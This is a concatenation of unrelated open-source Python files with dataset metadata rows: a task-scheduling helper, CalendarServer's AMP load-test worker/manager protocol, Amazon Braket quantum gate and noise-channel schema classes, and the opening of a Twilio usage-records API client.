task_stack = task_stack | children[T_]
'''
import networkx as nx
G = nx.DiGraph()
G.add_nodes_from(S.tasks())
G.add_edges_from([ (P.task_left,P.task_right) for P in S.precs_lax() ])
    task_list = list(nx.algorithms.topological_sort(G))
return task_list
#TODO: list as parameter of solving procedure
def solve(scenario,solve_method,task_list=None,batch_size=1,plot_method=None,msg=0) :
"""
Iteratively adds tasks and uses solve_method to integrate these
tasks into the schedule.
Arguments:
scenario : the scenario to solve
task_list : list of all tasks which defines the order in which all tasks are
added to the schedule
batch_size : the number of tasks to integrate in the schedule at a time
"""
S = scenario
if task_list is None :
task_list = sort_with_precs(S)
constraints = S._constraints # keep references and clear old reference list
S._constraints = []
#non_objective_tasks = [ T for T in task_list if not T.objective ]
for T in task_list :
S -= T #remove all tasks which are not part of objective
def batches(tasks, batch_size):
        for i in range(0, len(tasks), batch_size):
yield tasks[i:i+batch_size]
for batch in batches(task_list,batch_size) :
if msg :
print('INFO: batch for list scheduling '+','.join([ str(T) for T in batch]))
for T in batch :
S += T
S._constraints = [ C for C in constraints if set(C.tasks()).issubset(set(S.tasks())) ]
solve_method(S)
if plot_method is not None:
plot_method(S)
for T in S.tasks():
S += T >= T.start_value
| 26.166667 | 88 | 0.721757 |
83843009f88834104d6d7760e17c63db5d118882 | 5,711 | py | Python | contrib/performance/loadtest/ampsim.py | backwardn/ccs-calendarserver | 13c706b985fb728b9aab42dc0fef85aae21921c3 | [
"Apache-2.0"
] | 462 | 2016-08-14T17:43:24.000Z | 2022-03-17T07:38:16.000Z | contrib/performance/loadtest/ampsim.py | backwardn/ccs-calendarserver | 13c706b985fb728b9aab42dc0fef85aae21921c3 | [
"Apache-2.0"
] | 72 | 2016-09-01T23:19:35.000Z | 2020-02-05T02:09:26.000Z | contrib/performance/loadtest/ampsim.py | backwardn/ccs-calendarserver | 13c706b985fb728b9aab42dc0fef85aae21921c3 | [
"Apache-2.0"
] | 171 | 2016-08-16T03:50:30.000Z | 2022-03-26T11:49:55.000Z | ##
# Copyright (c) 2011-2017 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
##
"""
AMP-based simulator.
"""
if __name__ == '__main__':
# When run as a script, this is the worker process, receiving commands over
# stdin.
def runmain():
import traceback
try:
__import__("twext")
from twisted.python.log import startLogging
from sys import exit, stderr
startLogging(stderr)
from twisted.internet import reactor
from twisted.internet.stdio import StandardIO
from contrib.performance.loadtest.ampsim import Worker # @UnresolvedImport
from contrib.performance.loadtest.sim import LagTrackingReactor
StandardIO(Worker(LagTrackingReactor(reactor)))
reactor.run()
except:
traceback.print_exc()
exit(1)
else:
exit(0)
runmain()
from copy import deepcopy
from plistlib import writePlistToString, readPlistFromString
from twisted.python.log import msg, addObserver
from twisted.protocols.amp import AMP, Command, String, Unicode
from twext.enterprise.adbapi2 import Pickle
from contrib.performance.loadtest.sim import _DirectoryRecord, LoadSimulator
class Configure(Command):
"""
Configure this worker process with the text of an XML property list.
"""
arguments = [("plist", String())]
# Pass OSError exceptions through, presenting the exception message to the user.
errors = {OSError: 'OSError'}
class LogMessage(Command):
"""
This message represents an observed log message being relayed from a worker
process to the manager process.
"""
arguments = [("event", Pickle())]
class Account(Command):
"""
This message represents a L{_DirectoryRecord} loaded by the manager process
being relayed to a worker.
"""
arguments = [
("uid", Unicode()),
("password", Unicode()),
("commonName", Unicode()),
("email", Unicode()),
("guid", Unicode()),
]
class Worker(AMP):
"""
Protocol to be run in the worker process, to handle messages from its
manager.
"""
def __init__(self, reactor):
super(Worker, self).__init__()
self.reactor = reactor
self.records = []
@Account.responder
def account(self, **kw):
self.records.append(_DirectoryRecord(**kw))
return {}
@Configure.responder
def config(self, plist):
from sys import stderr
cfg = readPlistFromString(plist)
addObserver(self.emit)
sim = LoadSimulator.fromConfig(cfg)
sim.records = self.records
sim.attachServices(stderr)
return {}
def emit(self, eventDict):
if 'type' in eventDict:
self.reactor.callFromThread(
self.callRemote, LogMessage, event=eventDict
)
def connectionLost(self, reason):
super(Worker, self).connectionLost(reason)
msg("Standard IO connection lost.")
self.reactor.stop()
class Manager(AMP):
"""
Protocol to be run in the coordinating process, to respond to messages from
a single worker.
"""
def __init__(self, loadsim, whichWorker, numWorkers, output):
super(Manager, self).__init__()
self.loadsim = loadsim
self.whichWorker = whichWorker
self.numWorkers = numWorkers
self.output = output
def connectionMade(self):
super(Manager, self).connectionMade()
for record in self.loadsim.records:
self.callRemote(Account,
uid=record.uid,
password=record.password,
commonName=record.commonName,
email=record.email,
guid=record.guid)
workerConfig = deepcopy(self.loadsim.configTemplate)
# The list of workers is for the manager only; the workers themselves
# know they're workers because they _don't_ receive this list.
del workerConfig["workers"]
# The manager loads the accounts via the configured loader, then sends
# them out to the workers (right above), which look at the state at an
# instance level and therefore don't need a globally-named directory
# record loader.
del workerConfig["accounts"]
workerConfig["workerID"] = self.whichWorker
workerConfig["workerCount"] = self.numWorkers
workerConfig["observers"] = []
workerConfig.pop("accounts", None)
plist = writePlistToString(workerConfig)
self.output.write("Initiating worker configuration\n")
def completed(x):
self.output.write("Worker configuration complete.\n")
def failed(reason):
self.output.write("Worker configuration failed. {}\n".format(reason))
self.callRemote(Configure, plist=plist).addCallback(completed).addErrback(failed)
@LogMessage.responder
def observed(self, event):
# from pprint import pformat
# self.output.write(pformat(event)+"\n")
msg(**event)
return {}
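# For orientation, a hypothetical sketch of launching one worker subprocess and
# attaching the Manager protocol over stdio; LoadSimulator normally does this
# wiring, and 'loadsim' below is assumed to be a configured instance.
#
#   import sys
#   from twisted.internet import reactor
#   from twisted.internet.endpoints import ProcessEndpoint, connectProtocol
#
#   endpoint = ProcessEndpoint(reactor, sys.executable,
#       args=(sys.executable, "-m", "contrib.performance.loadtest.ampsim"))
#   d = connectProtocol(endpoint, Manager(loadsim, 0, 1, sys.stderr))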
| 30.704301 | 89 | 0.639293 |
f0514f8eae309f95f99624072f2fdb18fc361282 | 26,979 | py | Python | src/braket/ir/jaqcd/instructions.py | orclassiq/amazon-braket-schemas-python | 895ccb6c15a678975894b7b13fc91febe914719e | [
"Apache-2.0"
] | null | null | null | src/braket/ir/jaqcd/instructions.py | orclassiq/amazon-braket-schemas-python | 895ccb6c15a678975894b7b13fc91febe914719e | [
"Apache-2.0"
] | null | null | null | src/braket/ir/jaqcd/instructions.py | orclassiq/amazon-braket-schemas-python | 895ccb6c15a678975894b7b13fc91febe914719e | [
"Apache-2.0"
] | null | null | null | # Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from enum import Enum
from braket.ir.jaqcd.shared_models import (
Angle,
CompilerDirective,
DampingProbability,
DampingSingleProbability,
DoubleControl,
DoubleTarget,
MultiProbability,
MultiTarget,
SingleControl,
SingleProbability,
SingleProbability_34,
SingleProbability_1516,
SingleTarget,
TripleProbability,
TwoDimensionalMatrix,
TwoDimensionalMatrixList,
)
"""
Instructions that can be supplied to the braket.ir.jaqcd.Program.
To add a new instruction:
- Implement a class in this module.
- Class must contain a property, "type", that is an enum of the class implemented in the
next step.
- Implement a subclass, "Type", within this class that extends [str, enum].
All enum values must be unique across all instructions, otherwise de-serialization
      will have nondeterministic behavior. These enums will be used to determine what type
the instruction is, i.e. what class to use for deserializing.
    - NOTE: Due to how multiple inheritance works in Python it is easiest to define a
type enum class within each instruction, instead of calling the relevant parent
constructors to initialize it correctly.
- Inherit any classes from braket.ir.jaqcd.shared_models.
- Write up docstrings to define the instruction, properties, and examples.
"""
class H(SingleTarget):
"""
Hadamard gate.
Attributes:
type (str): The instruction type. default = "h". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> H(target=1)
"""
class Type(str, Enum):
h = "h"
type = Type.h
class I(SingleTarget): # noqa: E742, E261
"""
Identity gate.
Attributes:
type (str): The instruction type. default = "i". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> I(target=1)
"""
class Type(str, Enum):
i = "i"
type = Type.i
class X(SingleTarget):
"""
Pauli-X gate.
Attributes:
type (str): The instruction type. default = "x". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> X(target=0)
"""
class Type(str, Enum):
x = "x"
type = Type.x
class Y(SingleTarget):
"""
Pauli-Y gate.
Attributes:
type (str): The instruction type. default = "y". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Y(target=0)
"""
class Type(str, Enum):
y = "y"
type = Type.y
class Z(SingleTarget):
"""
Pauli-Z gate.
Attributes:
type (str): The instruction type. default = "z". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Z(target=0)
"""
class Type(str, Enum):
z = "z"
type = Type.z
class Rx(SingleTarget, Angle):
"""
X-axis rotation gate.
Attributes:
type (str): The instruction type. default = "rx". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
Examples:
>>> Rx(target=0, angle=0.15)
"""
class Type(str, Enum):
rx = "rx"
type = Type.rx
class Ry(SingleTarget, Angle):
"""
Y-axis rotation gate.
Attributes:
type (str): The instruction type. default = "ry". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
Examples:
>>> Ry(target=0, angle=0.15)
"""
class Type(str, Enum):
ry = "ry"
type = Type.ry
class Rz(SingleTarget, Angle):
"""
Z-axis rotation gate.
Attributes:
type (str): The instruction type. default = "rz". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
Examples:
>>> Rz(target=0, angle=0.15)
"""
class Type(str, Enum):
rz = "rz"
type = Type.rz
class S(SingleTarget):
"""
S gate. Applies a 90 degree rotation around the Z-axis.
Attributes:
type (str): The instruction type. default = "s". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> S(target=0)
"""
class Type(str, Enum):
s = "s"
type = Type.s
class T(SingleTarget):
"""
T gate. Applies a 45 degree rotation around the Z-axis.
Attributes:
type (str): The instruction type. default = "t". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> T(target=0)
"""
class Type(str, Enum):
t = "t"
type = Type.t
class Si(SingleTarget):
"""
Si gate. Conjugate transpose of S gate.
Attributes:
type (str): The instruction type. default = "si". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Si(target=0)
"""
class Type(str, Enum):
si = "si"
type = Type.si
class Ti(SingleTarget):
"""
Ti gate. Conjugate transpose of T gate.
Attributes:
type (str): The instruction type. default = "ti". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Ti(target=0)
"""
class Type(str, Enum):
ti = "ti"
type = Type.ti
class Swap(DoubleTarget):
"""
Swap gate. Swaps the state of the two qubits.
Attributes:
type (str): The instruction type. default = "swap". (type) is optional.
This should be unique among all instruction types.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> Swap(targets=[0, 1])
"""
class Type(str, Enum):
swap = "swap"
type = Type.swap
class CSwap(SingleControl, DoubleTarget):
"""
Controlled swap gate.
Attributes:
type (str): The instruction type. default = "cswap". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> Swap(control=0, targets=[1, 2])
"""
class Type(str, Enum):
cswap = "cswap"
type = Type.cswap
class ISwap(DoubleTarget):
"""
ISwap gate. Swaps the state of two qubits, applying a -i phase to q1 when it is in the 1 state
and a -i phase to q2 when it is in the 0 state.
This is equivalent to XY(pi)
Attributes:
type (str): The instruction type. default = "iswap". (type) is optional.
This should be unique among all instruction types.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> ISwap(targets=[0, 1])
"""
class Type(str, Enum):
iswap = "iswap"
type = Type.iswap
class PSwap(DoubleTarget, Angle):
"""
Parameterized swap gate that takes in the angle of the phase to apply to the swapped states.
Attributes:
type (str): The instruction type. default = "pswap". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> PSwap(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
pswap = "pswap"
type = Type.pswap
class XY(DoubleTarget, Angle):
"""
Rotates between \\|01> and \\|10> by the given angle.
Attributes:
type (str): The instruction type. default = "xy". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> XY(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
xy = "xy"
type = Type.xy
class PhaseShift(SingleTarget, Angle):
"""
Phase shift gate. Shifts the phase between \\|0> and \\|1> by a given angle.
Attributes:
type (str): The instruction type. default = "phaseshift". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> PhaseShift(target=1, angle=0.15)
"""
class Type(str, Enum):
phaseshift = "phaseshift"
type = Type.phaseshift
class CPhaseShift(SingleTarget, SingleControl, Angle):
"""
Controlled phase shift gate.
Attributes:
type (str): The instruction type. default = "cphaseshift". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CPhaseShift(control=0, target=1, angle=0.15)
"""
class Type(str, Enum):
cphaseshift = "cphaseshift"
type = Type.cphaseshift
class CPhaseShift00(SingleTarget, SingleControl, Angle):
"""
Controlled phase shift gate that phases the \\|00> state.
Attributes:
type (str): The instruction type. default = "cphaseshift00". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CPhaseShift00(control=0, target=1, angle=0.15)
"""
class Type(str, Enum):
cphaseshift00 = "cphaseshift00"
type = Type.cphaseshift00
class CPhaseShift01(SingleTarget, SingleControl, Angle):
"""
Controlled phase shift gate that phases the \\|01> state.
Attributes:
type (str): The instruction type. default = "cphaseshift01". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CPhaseShift01(control=0, target=1, angle=0.15)
"""
class Type(str, Enum):
cphaseshift01 = "cphaseshift01"
type = Type.cphaseshift01
class CPhaseShift10(SingleTarget, SingleControl, Angle):
"""
Controlled phase shift gate that phases the \\|10> state.
Attributes:
type (str): The instruction type. default = "cphaseshift10". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CPhaseShift10(control=0, target=1, angle=0.15)
"""
class Type(str, Enum):
cphaseshift10 = "cphaseshift10"
type = Type.cphaseshift10
class CNot(SingleTarget, SingleControl):
"""
Controlled not gate. Also known as the CX gate.
Attributes:
type (str): The instruction type. default = "cnot". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CNot(control=0, target=1)
"""
class Type(str, Enum):
cnot = "cnot"
type = Type.cnot
class CCNot(SingleTarget, DoubleControl):
"""
Doubly-controlled NOT gate. Also known as the Toffoli gate.
Attributes:
type (str): The instruction type. default = "ccnot". (type) is optional.
This should be unique among all instruction types.
controls (List[int]): The control qubits.
This is a list with two items and all items are int >= 0.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CCNot(controls=[0, 1], target=2)
"""
class Type(str, Enum):
ccnot = "ccnot"
type = Type.ccnot
class CV(SingleTarget, SingleControl):
"""
Controlled sqrt(NOT) gate. Also known as the CV gate.
Attributes:
type (str): The instruction type. default = "cv". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CV(control=0, target=1)
"""
class Type(str, Enum):
cv = "cv"
type = Type.cv
class CY(SingleTarget, SingleControl):
"""
Controlled Y-gate.
Attributes:
type (str): The instruction type. default = "cy". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CY(control=0, target=1)
"""
class Type(str, Enum):
cy = "cy"
type = Type.cy
class CZ(SingleTarget, SingleControl):
"""
Controlled Z-gate.
Attributes:
type (str): The instruction type. default = "cz". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CZ(control=0, target=1)
"""
class Type(str, Enum):
cz = "cz"
type = Type.cz
class XX(DoubleTarget, Angle):
"""
The Ising (XX) gate.
Attributes:
type (str): The instruction type. default = "xx". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> XX(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
xx = "xx"
type = Type.xx
class YY(DoubleTarget, Angle):
"""
The Ising (YY) gate.
Attributes:
type (str): The instruction type. default = "yy". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> YY(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
yy = "yy"
type = Type.yy
class ZZ(DoubleTarget, Angle):
"""
The Ising (ZZ) gate.
Attributes:
type (str): The instruction type. default = "zz". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> ZZ(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
zz = "zz"
type = Type.zz
class V(SingleTarget):
"""
Square root of NOT gate.
Attributes:
type (str): The instruction type. default = "v". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> V(target=0)
"""
class Type(str, Enum):
v = "v"
type = Type.v
class Vi(SingleTarget):
"""
Conjugate transpose of square root of NOT gate.
Attributes:
type (str): The instruction type. default = "vi". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Vi(target=0)
"""
class Type(str, Enum):
vi = "vi"
type = Type.vi
class Unitary(TwoDimensionalMatrix, MultiTarget):
"""
Arbitrary unitary matrix gate.
Attributes:
type (str): The instruction type. default = "unitary". (type) is optional.
This should be unique among all instruction types.
targets (List[int]): The target qubits. This is a list with ints and all ints >= 0.
matrix (List[List[List[float]]]): The unitary matrix specifying the behavior of the gate.
Examples:
>>> Unitary(targets=[0], matrix=[[[0, 0], [1, 0]],[[1, 0], [0, 1]]])
"""
class Type(str, Enum):
unitary = "unitary"
type = Type.unitary
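# --- Illustrative helper (an editor's sketch, not part of the generated schema) ---
# The `matrix` field encodes every complex entry as a [real, imag] pair, so an
# ordinary complex matrix has to be unpacked first. `_complex_matrix_to_ir` is
# a hypothetical name used only for this example.
def _complex_matrix_to_ir(matrix):
    # e.g. [[0, 1], [1, 0]] -> [[[0.0, 0.0], [1.0, 0.0]], [[1.0, 0.0], [0.0, 0.0]]]
    return [[[complex(entry).real, complex(entry).imag] for entry in row] for row in matrix]
# Example: a Pauli-X expressed as an arbitrary unitary on qubit 0:
# >>> Unitary(targets=[0], matrix=_complex_matrix_to_ir([[0, 1], [1, 0]]))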
class BitFlip(SingleTarget, SingleProbability):
"""
Bit Flip noise channel.
Attributes:
type (str): The instruction type. default = "bit_flip". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> BitFlip(target=1, probability=0.1)
"""
class Type(str, Enum):
bit_flip = "bit_flip"
type = Type.bit_flip
class PhaseFlip(SingleTarget, SingleProbability):
"""
Phase Flip noise channel.
Attributes:
type (str): The instruction type. default = "phase_flip". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> PhaseFlip(target=1, probability=0.1)
"""
class Type(str, Enum):
phase_flip = "phase_flip"
type = Type.phase_flip
class PauliChannel(SingleTarget, TripleProbability):
"""
A single qubit Pauli noise channel.
Attributes:
type (str): The instruction type. default = "pauli_channel". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> PauliChannel(target=1, probX=0.1, probY=0.2, probZ=0.3)
"""
class Type(str, Enum):
pauli_channel = "pauli_channel"
type = Type.pauli_channel
class MultiQubitPauliChannel(DoubleTarget, MultiProbability):
"""
Multi-qubit Pauli noise channel.
Attributes:
type (str): The instruction type. default = "multi_qubit_pauli_channel". (type) is
optional. This should be unique among all instruction types.
targets (List[int]): The target qubit(s). This is a list of integers >= 0.
The length of the list must match the length of the Pauli strings provided.
Examples:
>>> MultiQubitPauliChannel(targets=[1], probabilities={"X": 0.1})
>>> MultiQubitPauliChannel(targets=[0,1], probabilities={"XY": 0.1})
>>> MultiQubitPauliChannel(targets=[0,1,2], probabilities={"XYZ": 0.1})
"""
class Type(str, Enum):
multi_qubit_pauli_channel = "multi_qubit_pauli_channel"
type = Type.multi_qubit_pauli_channel
class Depolarizing(SingleTarget, SingleProbability_34):
"""
Depolarizing noise channel.
Attributes:
type (str): The instruction type. default = "depolarizing". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Depolarizing(target=1, probability=0.1)
"""
class Type(str, Enum):
depolarizing = "depolarizing"
type = Type.depolarizing
class TwoQubitDepolarizing(DoubleTarget, SingleProbability_1516):
"""
Two-Qubit Depolarizing noise channel.
Attributes:
type (str): The instruction type. default = "two_qubit_depolarizing".
(type) is optional. This should be unique among all instruction types.
targets (List[int]): The target qubits. This is a list with two items and all items are int >= 0.
Examples:
>>> TwoQubitDepolarizing(targets=[0, 1], probability=0.1)
"""
class Type(str, Enum):
two_qubit_depolarizing = "two_qubit_depolarizing"
type = Type.two_qubit_depolarizing
class TwoQubitDephasing(DoubleTarget, SingleProbability_34):
"""
Two-Qubit Dephasing noise channel.
Attributes:
type (str): The instruction type. default = "two_qubit_dephasing".
(type) is optional. This should be unique among all instruction types.
targets (List[int]): The target qubits. This is a list with two items and all items are int >= 0.
Examples:
>>> TwoQubitDephasing(targets=[0, 1], probability=0.1)
"""
class Type(str, Enum):
two_qubit_dephasing = "two_qubit_dephasing"
type = Type.two_qubit_dephasing
class AmplitudeDamping(SingleTarget, DampingProbability):
"""
Amplitude Damping noise channel.
Attributes:
type (str): The instruction type. default = "amplitude_damping". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> AmplitudeDamping(target=1, gamma=0.1)
"""
class Type(str, Enum):
amplitude_damping = "amplitude_damping"
type = Type.amplitude_damping
class GeneralizedAmplitudeDamping(SingleTarget, DampingProbability, DampingSingleProbability):
"""
Generalized Amplitude Damping noise channel.
Attributes:
type (str): The instruction type. default = "generalized_amplitude_damping". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> GeneralizedAmplitudeDamping(target=1, gamma=0.1, probability=0.9)
"""
class Type(str, Enum):
generalized_amplitude_damping = "generalized_amplitude_damping"
type = Type.generalized_amplitude_damping
class PhaseDamping(SingleTarget, DampingProbability):
"""
Phase Damping noise channel.
Attributes:
type (str): The instruction type. default = "phase_damping". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> PhaseDamping(target=1, gamma=0.1)
"""
class Type(str, Enum):
phase_damping = "phase_damping"
type = Type.phase_damping
class Kraus(TwoDimensionalMatrixList, MultiTarget):
"""
Arbitrary quantum channel defined by the input matrices.
Attributes:
type (str): The instruction type. default = "kraus". (type) is optional.
This should be unique among all instruction types.
targets (List[int]): The target qubits. This is a list with ints and all ints >= 0.
matrices (List[List[List[List[float]]]]): A list of matrices specifying
the quantum channel. A complex number is represented as a list of 2
real numbers. So each matrix has type List[List[List[float]]].
Examples:
>>> matrix1 = [[[1/sqrt(2), 0],[0, 0]],[[0, 0],[1/sqrt(2), 0]]]
>>> matrix2 = [[[0, 0],[1/sqrt(2), 0]],[[1/sqrt(2), 0],[0, 0]]]
>>> matrices = [matrix1, matrix2]
>>> Kraus(targets=[0], matrices=matrices)
"""
class Type(str, Enum):
kraus = "kraus"
type = Type.kraus
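# --- Illustrative helper (an editor's sketch, not part of the generated schema) ---
# Amplitude damping with rate gamma (0 <= gamma <= 1, an assumption of this
# sketch) written out as explicit Kraus matrices in the [real, imag] pair
# format documented above. `_amplitude_damping_kraus` is a hypothetical name.
def _amplitude_damping_kraus(gamma):
    from math import sqrt
    # K0 = [[1, 0], [0, sqrt(1 - gamma)]], K1 = [[0, sqrt(gamma)], [0, 0]]
    k0 = [[[1.0, 0.0], [0.0, 0.0]], [[0.0, 0.0], [sqrt(1 - gamma), 0.0]]]
    k1 = [[[0.0, 0.0], [sqrt(gamma), 0.0]], [[0.0, 0.0], [0.0, 0.0]]]
    return [k0, k1]
# Example: >>> Kraus(targets=[0], matrices=_amplitude_damping_kraus(0.1))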
class StartVerbatimBox(CompilerDirective):
"""
StartVerbatimBox is a compiler directive that marks the start of a portion of
code in which the instructions between StartVerbatimBox and EndVerbatimBox are
preserved from being modified in any way by the compiler.
Attributes:
type (str): The instruction type. default = "start_verbatim_box". (type) is optional.
This should be unique among all instruction types.
Examples:
>>> StartVerbatimBox()
"""
class Type(str, Enum):
start_verbatim_box = "start_verbatim_box"
type = Type.start_verbatim_box
directive: str = "StartVerbatimBox"
class EndVerbatimBox(CompilerDirective):
"""
EndVerbatimBox is a compiler directive that marks the end of a portion of
code in which the instructions between StartVerbatimBox and EndVerbatimBox are
preserved from being modified in any way by the compiler.
Attributes:
type (str): The instruction type. default = "end_verbatim_box". (type) is optional.
This should be unique among all instruction types.
Examples:
>>> EndVerbatimBox()
"""
class Type(str, Enum):
end_verbatim_box = "end_verbatim_box"
type = Type.end_verbatim_box
directive: str = "EndVerbatimBox"
| 27.251515 | 98 | 0.614367 |
ec48e76649d48f6f96741d44e222932b0549cc23 | 28,305 | py | Python | aws_deploy_package/twilio/rest/api/v2010/account/usage/record/this_month.py | anandhakrishnanh1998/Twilio-Chat-Bot | bb5cb02e363deb4c31a24cae6b0fd0b893ef2e20 | ["MIT"] | null | null | null | aws_deploy_package/twilio/rest/api/v2010/account/usage/record/this_month.py | anandhakrishnanh1998/Twilio-Chat-Bot | bb5cb02e363deb4c31a24cae6b0fd0b893ef2e20 | ["MIT"] | 9 | 2019-12-05T00:49:12.000Z | 2021-09-08T01:31:25.000Z | flask/lib/python3.6/site-packages/twilio/rest/api/v2010/account/usage/record/this_month.py | JOFLIX/grapevines | 34576e01184570d79cc140b42ffb71d322132da6 | ["MIT", "Unlicense"] | null | null | null | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import serialize
from twilio.base import values
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class ThisMonthList(ListResource):
""" """
def __init__(self, version, account_sid):
"""
Initialize the ThisMonthList
:param Version version: Version that contains the resource
:param account_sid: A 34 character string that uniquely identifies this resource.
:returns: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthList
:rtype: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthList
"""
super(ThisMonthList, self).__init__(version)
# Path Solution
self._solution = {'account_sid': account_sid, }
self._uri = '/Accounts/{account_sid}/Usage/Records/ThisMonth.json'.format(**self._solution)
def stream(self, category=values.unset, start_date=values.unset,
end_date=values.unset, include_subaccounts=values.unset, limit=None,
page_size=None):
"""
Streams ThisMonthInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param ThisMonthInstance.Category category: The usage category of the UsageRecord resources to read
:param date start_date: Only include usage that has occurred on or after this date
:param date end_date: Only include usage that occurred on or before this date
:param bool include_subaccounts: Whether to include usage from the master account and all its subaccounts
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
